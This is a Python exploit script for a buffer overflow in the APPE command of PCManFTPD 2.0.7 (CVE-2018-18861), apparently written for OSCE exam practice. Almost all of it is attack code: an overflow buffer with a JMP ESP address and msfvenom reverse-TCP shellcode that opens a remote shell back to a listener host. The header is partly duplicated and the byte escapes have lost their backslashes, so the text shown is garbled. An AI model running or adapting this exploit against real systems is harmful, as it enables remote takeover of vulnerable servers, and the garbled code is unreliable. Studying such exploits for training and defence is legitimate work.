PCManFTPD 2.0.7 Server APPE Command Buffer Overflow

#!/usr/bin/python
# Exploit Title: PCManFTPD 2.0.7 Server APPE Command - Buffer Overflow Exploit
# Date: 30/10/2018
# Exploit Author: DC - Telspace Systems
# Vendor Homepage: http: #!/usr/bin/python
# Exploit Title: PCManFTPD 2.0.7 Server APPE Command - Buffer Overflow Exploit
# Date: 30/10/2018
# Exploit Author: DC - Telspace Systems
# Vendor Homepage: http://pcman.openfoundry.org/
# Contact: services[@]telspace.co.za
# Version: 2.0.7
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: CVE-2018-18861
# Created in preparation for OSCE - DC - Telspace Systems
# Simple BOF for APPE command in PCManFTPD 2.0.7

import socket
import sys

#Exact match at offset 2005 (MSF pattern find)
#JMP ESP = 7E429353 (user32.dll)
#shellcode thanks to MSF - msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.111 LPORT=443 -f c -a x86 --platform windows -b "x00x0Ax0Dxff" -e x86/shikata_ga_nai

shellcode = 'x41' * 2005
shellcode += 'x53x93x42x7e'
shellcode += 'x90' * 50
shellcode += ("xbexa3x2bxb0x95xdaxd4xd9x74x24xf4x58x31xc9xb1"
"x52x83xc0x04x31x70x0ex03xd3x25x52x60xefxd2x10"
"x8bx0fx23x75x05xeax12xb5x71x7fx04x05xf1x2dxa9"
"xeex57xc5x3ax82x7fxeax8bx29xa6xc5x0cx01x9ax44"
"x8fx58xcfxa6xaex92x02xa7xf7xcfxefxf5xa0x84x42"
"xe9xc5xd1x5ex82x96xf4xe6x77x6exf6xc7x26xe4xa1"
"xc7xc9x29xdax41xd1x2exe7x18x6ax84x93x9axbaxd4"
"x5cx30x83xd8xaex48xc4xdfx50x3fx3cx1cxecx38xfb"
"x5ex2axccx1fxf8xb9x76xfbxf8x6exe0x88xf7xdbx66"
"xd6x1bxddxabx6dx27x56x4axa1xa1x2cx69x65xe9xf7"
"x10x3cx57x59x2cx5ex38x06x88x15xd5x53xa1x74xb2"
"x90x88x86x42xbfx9bxf5x70x60x30x91x38xe9x9ex66"
"x3exc0x67xf8xc1xebx97xd1x05xbfxc7x49xafxc0x83"
"x89x50x15x03xd9xfexc6xe4x89xbexb6x8cxc3x30xe8"
"xadxecx9ax81x44x17x4dx6ex30x17xe2x06x43x17xfd"
"x6dxcaxf1x97x81x9bxaax0fx3bx86x20xb1xc4x1cx4d"
"xf1x4fx93xb2xbcxa7xdexa0x29x48x95x9axfcx57x03"
"xb2x63xc5xc8x42xedxf6x46x15xbaxc9x9exf3x56x73"
"x09xe1xaaxe5x72xa1x70xd6x7dx28xf4x62x5ax3axc0"
"x6bxe6x6ex9cx3dxb0xd8x5ax94x72xb2x34x4bxddx52"
"xc0xa7xdex24xcdxedxa8xc8x7cx58xedxf7xb1x0cxf9"
"x80xafxacx06x5bx74xdcx4cxc1xddx75x09x90x5fx18"
"xaax4fxa3x25x29x65x5cxd2x31x0cx59x9exf5xfdx13"
"x8fx93x01x87xb0xb1")

print "Connecting and sending buffer... "

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.3',21))
s.recv(1024)
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS anonymous ')
s.recv(1024)
s.send('APPE ' + shellcode + ' ')
s.close()

print "Executed, check for shell."